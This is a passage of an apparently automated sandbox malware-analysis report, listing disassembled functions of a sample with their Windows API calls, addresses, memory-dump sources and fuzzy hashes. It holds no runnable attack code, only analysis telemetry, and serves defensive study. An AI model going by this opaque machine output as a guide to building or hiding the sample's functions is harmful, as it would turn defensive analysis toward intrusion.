                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 659298297-0
                                                                              • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                              • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                              • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                              • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                              Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 004478A7
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                              • GetCursorPos.USER32(?), ref: 00447935
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                              • String ID:
                                                                              • API String ID: 1300944170-0
                                                                              • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                              • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                              • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                              • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                              Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FF1A78,000000F1,00000000,00000000), ref: 004414C6
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FF1A78,000000F1,00000001,00000000), ref: 004414F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                              • String ID:
                                                                              • API String ID: 142311417-0
                                                                              • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                              • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                              • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                              • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                              Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044955A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                              • _wcslen.LIBCMT ref: 004495C1
                                                                              • _wcslen.LIBCMT ref: 004495CE
                                                                              • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1843234404-0
                                                                              • Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                              • Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
                                                                              • Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
                                                                              • Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA
                                                                              Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                              • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                              • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                              • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                              Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00445721
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                              • _wcslen.LIBCMT ref: 004457A3
                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3087257052-0
                                                                              • Opcode ID: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                              • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                              • Opcode Fuzzy Hash: 453d8cf2d53bd446159bbb0baa073021fe1e74c256db72c881888fb31e2a567b
                                                                              • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                              Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00459DEF
                                                                              • GetForegroundWindow.USER32 ref: 00459E07
                                                                              • GetDC.USER32(00000000), ref: 00459E44
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                              • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                              • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                              • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                              Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                              • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                              • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 245547762-0
                                                                              • Opcode ID: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                              • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                              • Opcode Fuzzy Hash: c11d93ef0e5925fc7b778e12926c76e847d2ba71e7f4531691fb5523561cfb0e
                                                                              • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                              Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • BeginPath.GDI32(?), ref: 004471B7
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                              • String ID:
                                                                              • API String ID: 2338827641-0
                                                                              • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                              • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                              Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                              • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                              Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                              • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                              • DestroyIcon.USER32(?), ref: 0046FD58
                                                                              • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyIcon
                                                                              • String ID:
                                                                              • API String ID: 3419509030-0
                                                                              • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                              • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                              Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 004175AE
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __amsg_exit.LIBCMT ref: 004175CE
                                                                              • __lock.LIBCMT ref: 004175DE
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                              • InterlockedIncrement.KERNEL32(02FF2CE0), ref: 00417626
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 4271482742-0
                                                                              • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                              • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                              • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                              • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                              Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                              • String ID:
                                                                              • API String ID: 4023252218-0
                                                                              • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                              • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                              Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                              • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                              • MessageBeep.USER32(00000000), ref: 0046036D
                                                                              • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                              • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                              • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                              • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                              • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                              Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 1489400265-0
                                                                              • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                              • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                              • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                              • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                              Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
